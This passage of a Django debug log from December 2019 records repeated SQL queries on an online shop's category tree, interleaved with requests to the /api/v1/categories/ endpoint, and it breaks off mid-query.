(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:43:48,511 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:43:48] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 06:44:23,149 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:44:23,153 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:44:23,155 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:44:23,158 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:44:23,160 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:44:23,162 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:44:23,164 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:44:23,167 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:44:23,169 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:44:23,172 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:44:23,174 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:44:23] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 06:45:01,749 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:45:01,754 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:45:01,757 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:45:01,760 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:45:01,763 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:45:01,768 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:45:01,771 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:45:01,774 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:45:01,777 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:45:01,779 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:45:01,782 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:45:01] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 06:45:35,013 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:45:35,020 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:45:35,022 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:45:35,025 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:45:35,027 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:45:35,029 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:45:35,032 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:45:35,034 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:45:35,036 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:45:35,039 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:45:35,041 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:45:35] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 06:48:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:53:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 06:56:05,370 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:56:05,376 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:56:05,379 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:56:05,382 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:56:05,384 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:56:05,387 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:56:05,389 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:56:05,391 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:56:05,394 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:56:05,396 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:56:05,399 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:56:05] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 06:58:46] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:03:10,553 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:03:10,560 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:03:10,563 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:03:10,565 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:03:10,568 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:03:10,570 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:03:10,572 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:03:10,575 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:03:10,577 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:03:10,579 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:03:10,582 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:03:10] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:03:38,874 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:03:38,881 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:03:38,885 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:03:38,889 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:03:38,893 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:03:38,897 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:03:38,901 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:03:38,904 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:03:38,908 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:03:38,912 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:03:38,916 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:03:38] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:04:05,526 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:04:05,534 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 